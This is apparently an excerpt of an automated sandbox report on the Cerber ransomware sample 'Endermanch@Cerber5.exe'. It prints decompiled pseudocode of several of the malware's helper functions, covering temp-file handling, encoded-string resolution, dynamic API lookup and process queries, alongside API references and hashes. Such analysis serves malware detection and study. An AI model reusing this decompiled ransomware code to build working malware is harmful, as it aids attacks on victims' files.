					_t51 = _t50 -  *_t9;
					_push(_t50 -  *_t9);
					_push(E0040591C( &E0040D14C, 0x20, 0x4e29eca8));
					_push(_t38);
					E00402C20(_t38, _t44, _t46, _t51);
				}
				return  *0x40f1e0( &_v36);
			}

0x00402438
0x00402438
0x00402444
0x00402445
0x00402448
0x00402448
0x00402448
0x0040244a
0x0040244e
0x00402451
0x00402454
0x00402459
0x0040245c
0x0040245e
0x00402475
0x0040247d
0x0040247e
0x0040247f
0x00402484
0x00402484
0x0040248c
0x00402492
0x0040249a
0x004024a2
0x004024a9
0x004024a9
0x004024b2
0x004024b4
0x004024b6
0x004024c1
0x004024c6
0x004024c8
0x004024c8
0x004024b6
0x004024cd
0x004024d4
0x004024e0
0x004024ea
0x004024ec
0x004024ec
0x004024ef
0x00402504
0x00402505
0x00402506
0x0040250b
0x0040251b

APIs

GetTickCount.KERNEL32 ref: 00402463
RtlInitializeCriticalSection.NTDLL(?), ref: 00402492
GetTickCount.KERNEL32 ref: 004024D9
RtlDeleteCriticalSection.NTDLL(?), ref: 00402512

Part of subcall function 00404CDC: PathSkipRootW.SHLWAPI(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000), ref: 00404CE8
Part of subcall function 00404CDC: GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001,00000000), ref: 00404D10
Part of subcall function 00404CDC: CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\d06ed635,00000000,?,00000000,0040252D,00000000,?,?,?,004025E2,68f6,00000000,004026EC,004065F6,00000000,00000001), ref: 00404D1E

Strings

0jt, xrefs: 00402463, 004024D9
lf@, xrefs: 0040244A, 004024EC, 004024EF

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CountCriticalSectionTick$AttributesCreateDeleteDirectoryFileInitializePathRootSkip
String ID: 0jt$lf@
API String ID: 892241556-2925110192
Opcode ID: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
Instruction ID: 166ea61db472a150428fbf2cef9c788feb35943bfc0e1425f8dccfb6179776be
Opcode Fuzzy Hash: 1f54d61fc8af7bc45cf1c131fdf1c84b3a5d2e0742b843de307b586339b6c7b9
Instruction Fuzzy Hash: 0121F9B290021167DB10BBB59D4E98F3BA8DF48318B54043BF905F71C2DE7CD94986AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404D43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D43(WCHAR* __edi) {
				short _v524;
				short _v1044;
				void* __esi;
				int _t14;
				WCHAR* _t21;
				WCHAR* _t25;
				int _t26;
				WCHAR* _t27;
				void* _t28;

				_t25 = __edi;
				_t26 = 0;
				if(GetTempPathW(0x104,  &_v1044) != 0) {
					_t14 = GetTempFileNameW( &_v1044, E0040591C("W+x", 3, 0x9544c64e), 0,  &_v524);
					_t32 = _t14;
					if(_t14 != 0) {
						_t27 =  &_v524;
						E00404E5E(_t27, _t32);
						if(__edi != 0) {
							_t21 = _t28 + lstrlenW(_t27) * 2 - 0x208;
							while( *_t21 != 0x2e) {
								_t21 = _t21 - 2;
								__eflags = _t21;
							}
							if( *_t25 != 0x2e) {
								_t21 =  &(_t21[1]);
							}
							lstrcpyW(_t21, _t25);
						}
						_t26 = E00405933(0,  &_v524);
					}
				}
				return _t26;
			}

0x00404d43
0x00404d59
0x00404d63
0x00404d89
0x00404d8f
0x00404d91
0x00404d93
0x00404d99
0x00404da0
0x00404dab
0x00404db7
0x00404db4
0x00404db4
0x00404db4
0x00404dc1
0x00404dc3
0x00404dc3
0x00404dc8
0x00404dc8
0x00404ddd
0x00404ddd
0x00404d91
0x00404de3

APIs

GetTempPathW.KERNEL32(00000104,?,?), ref: 00404D5B
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00404D89

Part of subcall function 00404E5E: SetFileAttributesW.KERNEL32(?,00000080,00000000,00404D9E), ref: 00404E67

lstrlenW.KERNEL32(?), ref: 00404DA5
lstrcpyW.KERNEL32(?,00000000), ref: 00404DC8

Strings

{f@, xrefs: 00404D43
W+x, xrefs: 00404D6C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileTemp$AttributesNamePathlstrcpylstrlen
String ID: W+x${f@
API String ID: 1221998058-3981993173
Opcode ID: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
Instruction ID: 3d1850192e65b297c1812ba81e242392aa226734748325530c2f33dcaa0427c0
Opcode Fuzzy Hash: a1ca47ba922a6c9e17a081fd3359b07ae7a59c4bfb4ff8d8a74f7b4a615e1f6d
Instruction Fuzzy Hash: F70196F290022997CB70AB65DD09ED777ACEF80700F04017AB605F31D1EA78DE848AD8

Uniqueness

Uniqueness Score: -1.00%

Function 004099D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004099D8(void* __ecx, void* __edi, WCHAR* _a4) {
				short _v524;
				long _t12;
				signed int _t13;
				intOrPtr _t21;
				void* _t22;
				long _t24;
				signed int _t25;
				long _t27;

				_t22 = __ecx;
				_t12 = ExpandEnvironmentStringsW(_a4,  &_v524, 0x104);
				if(_v524 != 0x25) {
					_t13 =  *0x42fac8; // 0xa
					_push(__edi);
					_t27 =  *0x42fa64; // 0x5ed39d8
					_t12 = E004053CA(4 + _t13 * 4, _t22, _t27);
					 *0x42fa64 = _t12;
					if(_t12 != 0) {
						CharLowerBuffW( &_v524, lstrlenW( &_v524));
						_t21 = E00405933(0,  &_v524);
						_t25 =  *0x42fac8; // 0xa
						 *0x42fac8 =  *0x42fac8 + 1;
						_t24 =  *0x42fa64; // 0x5ed39d8
						 *((intOrPtr*)(_t24 + _t25 * 4)) = _t21;
						return _t21;
					}
				}
				return _t12;
			}

0x004099d8
0x004099f0
0x004099fe
0x00409a00
0x00409a05
0x00409a06
0x00409a13
0x00409a18
0x00409a20
0x00409a37
0x00409a46
0x00409a4b
0x00409a51
0x00409a58
0x00409a5e
0x00000000
0x00409a5e
0x00409a20
0x00409a62

APIs

ExpandEnvironmentStringsW.KERNEL32(0040A027,?,00000104), ref: 004099F0

Part of subcall function 004053CA: GetLastError.KERNEL32(00000000,00000000,00402F19,?,00405A60,?,00000000,00402E81,00402F19), ref: 004053D2
Part of subcall function 004053CA: SetLastError.KERNEL32(00000000,?,00405A60,?,00000000,00402E81,00402F19), ref: 00405457

lstrlenW.KERNEL32(00000025), ref: 00409A29
CharLowerBuffW.USER32(00000025,00000000), ref: 00409A37

Part of subcall function 00405933: lstrlenW.KERNEL32(?,00000000,0040691D,?), ref: 0040593E
Part of subcall function 00405933: memcpy.NTDLL(00000000,?,00000002,00000000,00000000,0040691D,?), ref: 0040595E

Strings

%, xrefs: 004099F6

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLastlstrlen$BuffCharEnvironmentExpandLowerStringsmemcpy
String ID: %
API String ID: 2407717054-2567322570
Opcode ID: 46f0568ee778dbd4156db8c4d3dedf2d164526a81877d53e97c3f72a8b6ec04a
Instruction ID: b68b054fab4078b33c7175d7f5feeef92c6c6c317c309be68269d8385537ad21
Opcode Fuzzy Hash: 46f0568ee778dbd4156db8c4d3dedf2d164526a81877d53e97c3f72a8b6ec04a
Instruction Fuzzy Hash: 9E0162716002089BCB20DF64ED48D9B37BCEB44304F800176E559E35B5EB749A8ACF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049F6 Relevance: 6.0, APIs: 4, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004049F6(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t25;
				void* _t26;

				_push(0x10);
				_push(0x40d9d8);
				E0040B654(__ebx, __edi, __esi);
				_t25 = __ecx;
				 *((intOrPtr*)(_t26 - 0x1c)) = 0;
				 *(_t26 - 0x20) = GetLastError();
				 *(_t26 - 4) = 0;
				if(E004049E4(_t25) == 0) {
					 *0x40f1d8(_t25 + 8);
					 *_t25 = GetCurrentProcessId();
					 *((intOrPtr*)(_t25 + 4)) = 0;
					 *((intOrPtr*)(_t26 - 0x1c)) = 1;
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				SetLastError( *(_t26 - 0x20));
				return E0040B68F( *((intOrPtr*)(_t26 - 0x1c)));
			}

0x004049f6
0x004049f8
0x004049fd
0x00404a02
0x00404a06
0x00404a0f
0x00404a12
0x00404a1e
0x00404a24
0x00404a30
0x00404a32
0x00404a35
0x00404a35
0x00404a45
0x00404a4c
0x00404a5a

APIs

GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09

Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CurrentErrorLastProcess$CriticalInitializeSection
String ID:
API String ID: 666570305-0
Opcode ID: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
Instruction ID: 6239d71e1b6d1d9b6d3a873080a6ec753aa0bdfafe20bcce74541f407a615959
Opcode Fuzzy Hash: 8d0a222941fdbcc95c59cec6384a4b78d50c2328e21d054b927e63f655ec6902
Instruction Fuzzy Hash: EDF01DB5C00205DBCB20EF65D90969EBBB0BF84310F10457BE551B36A0CB790945CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABB Relevance: 6.0, APIs: 4, Instructions: 28
threadCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00404ABB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t22;
				void* _t23;

				_push(0xc);
				_push(0x40d9f8);
				E0040B654(__ebx, __edi, __esi);
				_t22 = __ecx;
				 *(_t23 - 0x1c) = GetLastError();
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_t11 = E004049E4(_t22);
				_t25 = _t11;
				if(_t11 != 0 || E004049F6(__ebx, _t22, __edi, _t22, _t25) != 0) {
					 *0x40f1dc(_t22 + 8);
					 *((intOrPtr*)(_t22 + 4)) = GetCurrentThreadId();
				}
				 *(_t23 - 4) =  *(_t23 - 4) | 0xffffffff;
				SetLastError( *(_t23 - 0x1c));
				return E0040B68F(_t14);
			}

0x00404a5b
0x00404a5d
0x00404a62
0x00404a67
0x00404a6f
0x00404a72
0x00404a77
0x00404a7d
0x00404a7f
0x00404a90
0x00404a9c
0x00404a9c
0x00404aa8
0x00404aaf
0x00404aba

APIs

GetLastError.KERNEL32(0040D9F8,0000000C,00405854,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A69

Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

RtlEnterCriticalSection.NTDLL(?), ref: 00404A90
GetCurrentThreadId.KERNEL32 ref: 00404A96
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404AAF

Part of subcall function 004049F6: GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
Part of subcall function 004049F6: RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
Part of subcall function 004049F6: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
Part of subcall function 004049F6: SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalProcessSection$EnterInitializeThread
String ID:
API String ID: 2985312556-0
Opcode ID: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
Instruction ID: ed2fb18bf2bb44b178cf3cceb23bf943281626dd3940bfcf2b284636644175bb
Opcode Fuzzy Hash: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
Instruction Fuzzy Hash: 4CF082B4940302DBCB20BBB1DD0965E7764AF44315F20897FA922B65E0CB3D4A46DF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC0 Relevance: 6.0, APIs: 4, Instructions: 25
threadCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00404AC0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t20;
				void* _t22;

				_push(0xc);
				_push(0x40d9c8);
				E0040B654(__ebx, __edi, __esi);
				_t20 = __ecx;
				 *(_t22 - 0x1c) = GetLastError();
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				if(E004049E4(_t20) != 0) {
					if( *(_t20 + 4) == GetCurrentThreadId()) {
						 *(_t20 + 4) =  *(_t20 + 4) & 0x00000000;
					}
					_t12 =  *0x40f1e4(_t20 + 8);
				}
				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
				SetLastError( *(_t22 - 0x1c));
				return E0040B68F(_t12);
			}

0x00404ac0
0x00404ac2
0x00404ac7
0x00404acc
0x00404ad4
0x00404ad7
0x00404ae4
0x00404aef
0x00404af1
0x00404af1
0x00404af9
0x00404af9
0x00404b08
0x00404b0f
0x00404b1a

APIs

GetLastError.KERNEL32(0040D9C8,0000000C,004058FD,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404ACE

Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

GetCurrentThreadId.KERNEL32 ref: 00404AE6
RtlLeaveCriticalSection.NTDLL ref: 00404AF9
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404B0F

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CurrentErrorLast$CriticalLeaveProcessSectionThread
String ID:
API String ID: 736899326-0
Opcode ID: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
Instruction ID: 5d87240e8550010a82cb58736f3ebd64beaf0934954977050a7740b7a28618f7
Opcode Fuzzy Hash: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
Instruction Fuzzy Hash: B6F0A0B5C01601DBCB20BBA0DE0939E7770AF4131AF21817EE511B25D1CB7D5A09CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 00408485 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405693: lstrlen.KERNEL32(00000000,00405705,?,00000000), ref: 0040569B

FindMimeFromData.URLMON(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0040855A
lstrcmpiW.KERNEL32(?,00000030), ref: 00408577

Strings

2, xrefs: 004085FD

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: DataFindFromMimelstrcmpilstrlen
String ID: 2
API String ID: 2072262229-450215437
Opcode ID: 7a561d468afc9f80cb6f3808fbe95ba72a610e375edecba745370afe28735dc1
Instruction ID: d05574d99582fdf8de803fc1e31f7f13cfa1da4baa173e70d20c9639e5a0a858
Opcode Fuzzy Hash: 7a561d468afc9f80cb6f3808fbe95ba72a610e375edecba745370afe28735dc1
Instruction Fuzzy Hash: FA7103B1D00209AFDF10DFA5C984AEEBBB9BF48304F01447AE945B7250DB3A9A45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00405F6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00405F6B(void* __ecx, void* __eflags, intOrPtr _a4) {
				CHAR* _t4;
				_Unknown_base(*)()* _t7;
				signed int _t8;
				signed int _t10;

				_t10 = 0;
				if(E00405EF5(__ecx) != 0) {
					_t4 = E00405905(0x40d370, 0x1e, 0x9f975aaf);
					_t7 = GetProcAddress(GetModuleHandleA(E00405905( &E0040D390, 0xc, 0x4f2d54ed)), _t4);
					if(_t7 != 0) {
						_t8 =  *_t7(_a4);
						asm("sbb esi, esi");
						_t10 =  ~( ~_t8);
					}
				}
				return _t10;
			}

0x00405f6c
0x00405f75
0x00405f83
0x00405fa8
0x00405fb0
0x00405fb6
0x00405fbc
0x00405fbe
0x00405fbe
0x00405fb0
0x00405fc3

APIs

Part of subcall function 00405EF5: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D), ref: 00405F3E
Part of subcall function 00405EF5: GetProcAddress.KERNEL32(00000000), ref: 00405F45

GetModuleHandleA.KERNEL32(00000000,?,?,00000000,C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
GetProcAddress.KERNEL32(00000000), ref: 00405FA8

Strings

C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe, xrefs: 00405F6B

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
API String ID: 1646373207-2487945927
Opcode ID: eb1521d442bcf14cb32f4a54366f8521662d93d7eb7da9abd42971e004c4292f
Instruction ID: acd6d1d985faa0ad3600296bc9f406459d3a206cf20db9fabc00ae0cf49a83ab
Opcode Fuzzy Hash: eb1521d442bcf14cb32f4a54366f8521662d93d7eb7da9abd42971e004c4292f
Instruction Fuzzy Hash: 5DE092B1A40621FADA3037B4AD06F0F2A588B04B40F020136B800F51C6EE7C88050ADE

Uniqueness

Uniqueness Score: -1.00%

Function 00405532 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(Cu@), ref: 00405537
gethostbyname.WS2_32(?), ref: 00405548

Strings

Cu@, xrefs: 00405533

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: Cu@
API String ID: 1594361348-2835949224
Opcode ID: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
Instruction ID: 4e8b9e47bf38c59bde1ecc2b7d999fb23bf2e5007af245ecbefbc72d7f427d54
Opcode Fuzzy Hash: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
Instruction Fuzzy Hash: 72D01735600520EFCB10AB29EC48946BBB1EB493B0B0546B1FA69B73B0C334DC50EA84

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 5753.tmpPID: 4948, Parent PID: 5364COMMON

Executed Functions

Function 00007FF7CEF21864 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51
nativelibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQuerySystemInformation.NTDLL ref: 00007FF7CEF21896
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF218AC
GetProcAddress.KERNEL32 ref: 00007FF7CEF218BC
LocalAlloc.KERNELBASE ref: 00007FF7CEF218C9
NtQuerySystemInformation.NTDLL ref: 00007FF7CEF218E0
LocalFree.KERNEL32 ref: 00007FF7CEF218F0

Strings

LocalAlloc, xrefs: 00007FF7CEF218B2
kernel32, xrefs: 00007FF7CEF218A5

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
String ID: LocalAlloc$kernel32
API String ID: 3225137318-3502785670
Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
Instruction ID: be8617b1cae468250e348172b45ec9404f85c9037005730047974938c5634671
Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
Instruction Fuzzy Hash: 1C11BF72B18E4282EB84AF15A840629A2A1FBC8BE0F894031DE0D57764DF3DE845C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2214C Relevance: 4.6, APIs: 3, Instructions: 79
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E00007FF77FF7CEF2214C(long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long _a8, long long _a16, char _a24) {
				void* _v40;
				long long _v80;
				char _v88;
				long long _v96;
				char _v104;
				long long _v112;
				char _v120;
				long long _v136;
				long _t24;
				void* _t25;
				intOrPtr _t37;
				long long _t44;
				long long _t50;
				long long _t53;

				_t53 = __rsi;
				_t50 = __rdx;
				_a8 = __rbx;
				_a16 = __rsi;
				r13d = r8d;
				if ( *((intOrPtr*)(__rcx)) != 1) goto 0xcef22181;
				goto 0xcef2218a;
				GetCurrentProcess();
				_v104 = __rdx;
				_v120 = __rbx;
				_v112 = __rcx;
				_v96 = 0xcef30618;
				if (r13d == 0) goto 0xcef221b8;
				_t10 = _t50 - 0xa; // 0x10
				r14d = _t10;
				goto 0xcef221c7;
				_t12 = _t53 - 0x10; // 0x20
				r14d = _t12;
				_t37 =  *((intOrPtr*)(__rcx));
				if (_t37 == 0) goto 0xcef2222c;
				if (_t37 != 0) goto 0xcef2220e;
				r9d = 0x30;
				_v136 =  &_a24;
				_t24 = NtQueryInformationProcess(??, ??, ??, ??, ??); // executed
				if (_t24 < 0) goto 0xcef2220e;
				if (_a24 != 0x30) goto 0xcef2220e;
				_t44 = _v80;
				if (_t44 == 0) goto 0xcef2220e;
				r8d = r14d;
				_v120 = _t44;
				_t25 = E00007FF77FF7CEF21170(__rbx,  &_v104,  &_v120,  &_v88); // executed
				return _t25;
			}

0x7ff7cef2214c
0x7ff7cef2214c
0x7ff7cef2214c
0x7ff7cef22151
0x7ff7cef2216d
0x7ff7cef22176
0x7ff7cef2217f
0x7ff7cef22181
0x7ff7cef22191
0x7ff7cef22195
0x7ff7cef22199
0x7ff7cef2219d
0x7ff7cef221a4
0x7ff7cef221b2
0x7ff7cef221b2
0x7ff7cef221b6
0x7ff7cef221c3
0x7ff7cef221c3
0x7ff7cef221c9
0x7ff7cef221cb
0x7ff7cef221cf
0x7ff7cef221d5
0x7ff7cef221db
0x7ff7cef221e0
0x7ff7cef221e8
0x7ff7cef221ed
0x7ff7cef221ef
0x7ff7cef221f6
0x7ff7cef22200
0x7ff7cef22203
0x7ff7cef22207
0x7ff7cef2222b

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00007FF7CEF21E87), ref: 00007FF7CEF22181
NtQueryInformationProcess.NTDLL ref: 00007FF7CEF221E0
RtlGetCurrentPeb.NTDLL ref: 00007FF7CEF22231

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: CurrentProcess$InformationQuery
String ID:
API String ID: 4257070689-0
Opcode ID: 3216325d5727be30611d2a21d91d4ee2bb1751acad3ba8bfa970bbb89ccb7318
Instruction ID: 11dbc688807f651dc9261b4ff28083a38822101c567d33d814a02d44d6257dfa
Opcode Fuzzy Hash: 3216325d5727be30611d2a21d91d4ee2bb1751acad3ba8bfa970bbb89ccb7318
Instruction Fuzzy Hash: 2331B036B14B528AFBA4DF51E840AAD7364BB04BA8F900035DE0D23794DF39E856C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF22A34 Relevance: 49.1, APIs: 11, Strings: 17, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22AE5
GetProcAddress.KERNEL32 ref: 00007FF7CEF22AF5
LoadLibraryW.KERNELBASE ref: 00007FF7CEF22AFF
GetProcAddress.KERNEL32 ref: 00007FF7CEF22B18
